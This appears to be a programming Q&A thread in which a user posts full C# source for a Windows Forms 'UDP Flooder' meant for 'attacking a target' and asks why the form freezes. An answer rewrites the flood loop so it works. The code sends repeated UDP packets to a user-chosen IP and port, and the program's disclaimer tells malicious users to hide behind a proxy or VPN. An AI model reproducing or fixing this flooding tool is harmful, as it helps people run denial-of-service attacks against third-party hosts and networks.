# Form freezes after UDP flood

Tags: c#, udp, send, freeze, packet

I am working on a UDP Flooder and after the attack has finished the form freezes...

So how it works is I have the button that calls the method "startUDP" with the intent of attacking a target (which it does) and I created a check inside the method to check if the attack is over and if it is to stop the while loop. Unfortunately this does not stop the program from freezing :/

Any help is appreciated!

Here is my code so far:

```
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Text;
using System.IO;
using System.Net;
using System.Net.Sockets;
using System.Net.NetworkInformation;
using System.Threading;
using System.Windows.Forms;
using ComponentFactory.Krypton.Toolkit;

namespace XeFlooder_Reborn
{
    public partial class Form1 : ComponentFactory.Krypton.Toolkit.KryptonForm
    {
        int packets;
        int totalPackets;

        public Form1()
        {
            InitializeComponent();
        }

        private void udp_start_Click(object sender, EventArgs e)
        {
            DebugLabel.Text = "Debugging Label - Resetting Packet Count 0/2...";
            //Thread.Sleep(100);
            packets = 0;
            DebugLabel.Text = "Debugging Label - Resetting Packet Count 1/2...";
            //Thread.Sleep(100);
            totalPackets = Convert.ToInt32(udp_packets.Value);
            DebugLabel.Text = "Debugging Label - Resetting Packet Count 2/2...";
            //Thread.Sleep(100);
            DebugLabel.Text = "Debugging Label - Calling attack method...";
            //Thread.Sleep(100);
            startUDP(true);
        }

        private void startUDP(bool attacking)
        {
            while(attacking)
            {
                DebugLabel.Text = "Debugging Label - Checking attack status...";
                //Thread.Sleep(100);
                if (packets < totalPackets)
                {
                    DebugLabel.Text = "Debugging Label - Initiating Flood...";
                    //Thread.Sleep(500);

                    //UDP Packet being sent to target
                    DebugLabel.Text = "Debugging Label - Creating packet that will be sent to target...";
                    //Thread.Sleep(100);
                    byte[] packet = ASCIIEncoding.ASCII.GetBytes("<XeFlooder Reborn 1.0>");
                    DebugLabel.Text = "Debugging Label - Packet creation successful...";
                    //Thread.Sleep(100);

                    //Assign Target End Point
                    DebugLabel.Text = "Debugging Label - Assigning end point based on IP and Port combination...";
                    //Thread.Sleep(100);
                    IPEndPoint ep = new IPEndPoint(IPAddress.Parse(udp_ip.Text), Convert.ToInt32(udp_port.Value));
                    DebugLabel.Text = "Debugging Label - End Point creation successful...";

                    //Socket used to flood client
                    //Thread.Sleep(100);
                    DebugLabel.Text = "Debugging Label - Creating Socket...";
                    Socket target = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);
                    //Thread.Sleep(100);
                    DebugLabel.Text = "Debugging Label - Socket creation successful!";

                    //Increase counted packets by 1
                    packets++;
                    DebugLabel.Text = "Debugging Label - Sending target the packet...";
                    //Send packet to target
                    target.SendTo(packet, ep);
                    DebugLabel.Text = "Debugging Label - Flood finished...";

                    //Update Progress Trackers
                    udp_progress_bar.Maximum = totalPackets;
                    udp_progress_bar.Value = packets;
                    udp_progress_text.Text = "Progress: " + Convert.ToString(packets) + "/" + Convert.ToString(totalPackets);

                    //Check if we have reached flood limit (if attack is over)
                    if (attacking && udp_progress_bar.Value == udp_progress_bar.Maximum)
                    {
                        //Let the user know our attack is finished
                        MessageBox.Show("Successful UDP Flood Finished!");

                        //Reset packet count
                        packets = 0;
                        totalPackets = 0;

                        //Turn off attack loop
                        attacking = false;
                    }
                }
            }
            while (!attacking)
            {
                DebugLabel.Text = "Debugging Label - Waiting for command...";
            }
        }

        private string GetMacAddress()
        {
            string macAddresses = string.Empty;
            foreach (NetworkInterface nic in NetworkInterface.GetAllNetworkInterfaces())
            {
                if (nic.OperationalStatus == OperationalStatus.Up)
                {
                    macAddresses += nic.GetPhysicalAddress().ToString();
                    break;
                }
            }
            return macAddresses;
        }

        private void Form1_Load(object sender, EventArgs e)
        {
            MessageBox.Show("The developers of XeFlooder (Reborn) are not responsible for what you do with this program, it was made for stress testing. If you choose to use this program for malicious purposes please do so while using a Proxy or a VPN. Enjoy...", "DISCLAIMER!");
            if (NetworkInterface.GetIsNetworkAvailable() != true)
            {
                MessageBox.Show("You need to be connected to the internet to use this program...\nNow exiting...");
                this.Close();
            }
            WebRequest request = WebRequest.Create("http://icanhazip.com/");
            WebResponse response = request.GetResponse();
            System.IO.StreamReader sr = new System.IO.StreamReader(response.GetResponseStream());
            string IP = sr.ReadToEnd();
            IPHostEntry host = Dns.GetHostEntry(Dns.GetHostName());
            info.Items.Add("Public IP Address: " + IP);
            foreach (IPAddress ip in host.AddressList)
            {
                if (ip.AddressFamily.ToString() == "InterNetwork")
                {
                    info.Items.Add("IPv4 Address: " + ip.ToString());
                }
            }
            info.Items.Add("Link Local Address: " + IPAddress.Broadcast);
            info.Items.Add("Machine Name: " + Dns.GetHostName());
            info.Items.Add("MAC Address: " + GetMacAddress());
        }
    }
}
```

Answer (score 1):

I suspect your problem is, your setting 'attacking' false inside a nested 'if' block.  so when the outer block reads false(i.e. when packets == totalPackets) everythinbg gets by-passed and 'attacking' never gets set to false and your while loop becomes infinite.

It appears that changing your conditional to `if (packets <= totalPackets)` would fix it.

Can't really duplicate your problem, but here's a slightly different way to do the same thing that can't have an infinite loop.  This way if the problem persists it's not the loop.

```
       if(attacking)
        {
            //DebugLabel.Text = "Debugging Label - Checking attack status...";
            for (; packets <= totalPackets;packets++ )
            {              
                    //Thread.Sleep(100);

                    DebugLabel.Text = "Debugging Label - Initiating Flood...";
                    //Thread.Sleep(500);

                    //UDP Packet being sent to target
                    DebugLabel.Text = "Debugging Label - Creating packet that will be sent to target...";
                    //Thread.Sleep(100);
                    byte[] packet = ASCIIEncoding.ASCII.GetBytes("<XeFlooder Reborn 1.0>");
                    DebugLabel.Text = "Debugging Label - Packet creation successful...";
                    //Thread.Sleep(100);

                    //Assign Target End Point
                    DebugLabel.Text = "Debugging Label - Assigning end point based on IP and Port combination...";
                    //Thread.Sleep(100);
                    IPEndPoint ep = new IPEndPoint(IPAddress.Parse(udp_ip.Text), Convert.ToInt32(udp_port.Value));
                    DebugLabel.Text = "Debugging Label - End Point creation successful...";

                    //Socket used to flood client
                    //Thread.Sleep(100);
                    DebugLabel.Text = "Debugging Label - Creating Socket...";
                    Socket target = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);
                    //Thread.Sleep(100);
                    DebugLabel.Text = "Debugging Label - Socket creation successful!";

                    DebugLabel.Text = "Debugging Label - Sending target the packet...";
                    //Send packet to target
                    target.SendTo(packet, ep);
                    DebugLabel.Text = "Debugging Label - Flood finished...";

                    udp_progress_bar.Maximum = totalPackets;
                    udp_progress_bar.Value = packets;
                    udp_progress_text.Text = "Progress: " + Convert.ToString(packets) + "/" + Convert.ToString(totalPackets);
            }
            MessageBox.Show("Successful UDP Flood Finished!");

            //Reset packet count
            packets = 0;
            totalPackets = 0;

            //Turn off attack loop
            attacking = false;
        }
        if (!attacking)
        {
            DebugLabel.Text = "Debugging Label - Waiting for command...";
        }
```

Comment: you would think that but if I put a messagebox in that check (packets == totalPackets) the message box comes up but it wont set attacking to false...

Comment: Can't really duplicate your problem, but I added a slightly different way to do the same thing that can't have an infinite loop. This way if the problem persists it's not the loop.